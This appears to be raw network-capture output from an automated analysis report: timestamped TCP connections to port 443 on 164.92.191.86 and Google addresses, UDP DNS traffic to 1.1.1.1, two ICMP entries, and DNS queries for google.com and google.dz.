                                                Dec 5, 2024 08:24:29.940560102 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.940617085 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.940674067 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.940881014 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.940896988 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.943363905 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.943386078 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.944408894 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.944426060 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.945379019 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.945400000 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:30.364299059 CET49936443192.168.2.5172.217.21.36
                                                Dec 5, 2024 08:24:30.364377022 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:30.364459991 CET49936443192.168.2.5172.217.21.36
                                                Dec 5, 2024 08:24:30.364670038 CET49936443192.168.2.5172.217.21.36
                                                Dec 5, 2024 08:24:30.364690065 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:30.911220074 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:30.911829948 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:30.911853075 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:30.912195921 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:30.912791967 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:30.912862062 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:30.913013935 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:30.913028955 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:30.913094997 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:30.959323883 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.327903986 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.329062939 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.332201958 CET49933443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.332218885 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.332427025 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.332456112 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.332642078 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.332923889 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.333319902 CET49933443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.333400965 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.333636045 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.333781004 CET49933443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.333842993 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.333853006 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.333940983 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.379343987 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.457315922 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.938141108 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.938265085 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.938323975 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.939785004 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.939815044 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.941898108 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.941926956 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.942089081 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.942265987 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.942277908 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.943428040 CET49943443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.943475962 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:31.943547010 CET49943443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.943733931 CET49943443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:31.943753958 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.055653095 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:32.055984974 CET49936443192.168.2.5172.217.21.36
                                                Dec 5, 2024 08:24:32.056027889 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:32.056356907 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:32.056708097 CET49936443192.168.2.5172.217.21.36
                                                Dec 5, 2024 08:24:32.056792021 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:32.159197092 CET49936443192.168.2.5172.217.21.36
                                                Dec 5, 2024 08:24:32.268928051 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.268937111 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.268949032 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.269022942 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.269052982 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.269104004 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.279671907 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.282598972 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.282658100 CET49933443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.282938004 CET49933443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.282949924 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.286686897 CET49944443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.286724091 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.286844015 CET49944443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.287101030 CET49944443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.287127018 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.475100040 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.475117922 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.475145102 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.475155115 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.475189924 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.475188017 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.475238085 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.475255013 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.475280046 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.516988039 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.517002106 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.517030001 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.517065048 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.517107010 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.517123938 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.517127037 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.517170906 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.517622948 CET49934443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.517642975 CET44349934164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.523529053 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.523591042 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:32.523658991 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.523957968 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:32.523972988 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.322390079 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.322770119 CET49943443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.322798014 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.323256969 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.323609114 CET49943443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.323678970 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.323753119 CET49943443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.324548960 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.324723005 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.324736118 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.325809002 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.325884104 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.327008963 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.327069998 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.327243090 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.367331982 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.371334076 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.379106998 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.379117966 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.425985098 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.668132067 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.668495893 CET49944443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.668509960 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.668848991 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.669229984 CET49944443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.669301987 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.669415951 CET49944443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.715325117 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.904205084 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.904514074 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.904542923 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.904894114 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.905519009 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.905591965 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:33.905678034 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:33.951345921 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.250915051 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.251096010 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.251172066 CET49943443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.253134012 CET49943443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.253149033 CET44349943164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.358724117 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.358808994 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.358858109 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.359352112 CET49942443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.359363079 CET44349942164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.360192060 CET49745443192.168.2.5172.217.17.67
                                                Dec 5, 2024 08:24:34.360284090 CET44349745172.217.17.67192.168.2.5
                                                Dec 5, 2024 08:24:34.360340118 CET49745443192.168.2.5172.217.17.67
                                                Dec 5, 2024 08:24:34.360593081 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.360630989 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.360723019 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.361074924 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.361089945 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.499850988 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.503969908 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.504050016 CET49944443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.504342079 CET49944443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.504353046 CET44349944164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.987664938 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.987690926 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.987705946 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.987767935 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:34.987796068 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:34.987855911 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.036917925 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.036942005 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.037190914 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.037220001 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.038077116 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.044770002 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.044858932 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.044866085 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.045072079 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.045085907 CET44349945164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.045098066 CET49945443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.067766905 CET49952443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.067807913 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.067907095 CET49952443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.068222046 CET49952443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.068238020 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.740046024 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.740427971 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.740447998 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.741539001 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.741631985 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.741975069 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.742038965 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.742142916 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.742153883 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.742191076 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:35.742302895 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:35.784873962 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.446969986 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.447411060 CET49952443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.447447062 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.447808027 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.448157072 CET49952443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.448220015 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.448368073 CET49952443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.491353989 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.688816071 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.688961029 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.689013004 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.690177917 CET49951443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.690201044 CET44349951164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.835386038 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.835428953 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:36.835485935 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.835715055 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:36.835726976 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:37.363846064 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:37.363943100 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:37.364042044 CET49952443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:37.364260912 CET49952443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:37.364286900 CET44349952164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:38.219060898 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:38.219472885 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:38.219495058 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:38.220536947 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:38.220618963 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:38.221029043 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:38.221086979 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:38.221189022 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:38.221196890 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:38.269509077 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:39.187805891 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:39.187922001 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:39.188035965 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:39.188710928 CET49958443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:39.188729048 CET44349958164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:41.764789104 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:41.764861107 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:41.764972925 CET49936443192.168.2.5172.217.21.36
                                                Dec 5, 2024 08:24:42.811799049 CET49936443192.168.2.5172.217.21.36
                                                Dec 5, 2024 08:24:42.811851978 CET44349936172.217.21.36192.168.2.5
                                                Dec 5, 2024 08:24:45.380405903 CET49980443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:45.380464077 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:45.380604029 CET49980443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:45.380847931 CET49980443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:45.380867004 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:46.760783911 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:46.761151075 CET49980443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:46.761169910 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:46.761523008 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:46.761840105 CET49980443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:46.761919022 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:46.762070894 CET49980443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:46.807331085 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:47.683475971 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:47.683557987 CET44349980164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:47.683634996 CET49980443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:47.683845997 CET49980443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:47.683868885 CET44349980164.92.191.86192.168.2.5

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 5, 2024 08:23:25.973824978 CET53609831.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:25.980137110 CET53536011.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:28.746792078 CET53626861.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:30.301805019 CET5310453192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:30.301958084 CET5976053192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:30.438810110 CET53531041.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:30.439059973 CET53597601.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:32.073708057 CET5687353192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:32.073903084 CET6513953192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:32.295399904 CET53651391.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:32.307507038 CET53568731.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:34.821935892 CET6509453192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:34.822118998 CET4987753192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:34.959326029 CET53650941.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:35.049535036 CET53498771.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:40.307728052 CET5209353192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:40.307874918 CET6515953192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:41.333853960 CET6547753192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:41.333997965 CET5682653192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:42.298604965 CET53568261.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:42.299113035 CET53520931.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:42.299206018 CET53654771.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:42.299474001 CET53651591.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:45.829706907 CET53539721.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:47.547344923 CET6026653192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:47.548172951 CET5251753192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:47.909048080 CET53602661.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:47.909696102 CET53525171.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:52.317553043 CET5931253192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:52.317719936 CET6195553192.168.2.51.1.1.1
                                                Dec 5, 2024 08:23:52.456048965 CET53619551.1.1.1192.168.2.5
                                                Dec 5, 2024 08:23:52.456701994 CET53593121.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:04.921050072 CET53543601.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:06.178311110 CET5284753192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:06.178491116 CET6135053192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:06.398577929 CET53528471.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:06.416120052 CET53613501.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:09.356527090 CET5252753192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:09.356709957 CET6514453192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:09.494348049 CET53525271.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:09.495584965 CET53651441.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:11.627645016 CET5696453192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:11.627830982 CET5239053192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:11.849556923 CET53569641.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:11.854069948 CET53523901.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:12.352530956 CET5358453192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:12.352708101 CET6053553192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:12.569581032 CET53535841.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:12.580929995 CET53605351.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:15.020289898 CET5222953192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:15.020448923 CET6493853192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:15.048571110 CET6264953192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:15.048840046 CET5283653192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:15.159692049 CET53649381.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:15.159709930 CET53522291.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:15.275166035 CET53626491.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:15.279696941 CET53528361.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:18.947472095 CET6470453192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:18.947690964 CET6215053192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:19.173156977 CET53647041.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:19.183398962 CET53621501.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:25.831363916 CET53637841.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:27.115040064 CET6519853192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:27.115389109 CET5852953192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:27.327359915 CET53626431.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:27.345592022 CET53585291.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:27.352560043 CET53651981.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:30.078497887 CET53646601.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:31.703804970 CET6109653192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:31.704303980 CET6020153192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:31.922158957 CET53610961.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:31.941420078 CET53602011.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:36.695091963 CET5222453192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:36.695251942 CET5377953192.168.2.51.1.1.1
                                                Dec 5, 2024 08:24:36.833595037 CET53522241.1.1.1192.168.2.5
                                                Dec 5, 2024 08:24:36.834923029 CET53537791.1.1.1192.168.2.5

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Dec 5, 2024 08:23:35.049607038 CET192.168.2.51.1.1.1c220(Port unreachable)Destination Unreachable
                                                Dec 5, 2024 08:23:42.299568892 CET192.168.2.51.1.1.1c241(Port unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 5, 2024 08:23:30.301805019 CET192.168.2.51.1.1.10x755eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:30.301958084 CET192.168.2.51.1.1.10x2a71Standard query (0)www.google.com65IN (0x0001)false
                                                Dec 5, 2024 08:23:32.073708057 CET192.168.2.51.1.1.10xed70Standard query (0)google.dzA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:32.073903084 CET192.168.2.51.1.1.10xa575Standard query (0)google.dz65IN (0x0001)false
                                                Dec 5, 2024 08:23:34.821935892 CET192.168.2.51.1.1.10xf395Standard query (0)www.google.dzA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:34.822118998 CET192.168.2.51.1.1.10x11ceStandard query (0)www.google.dz65IN (0x0001)false
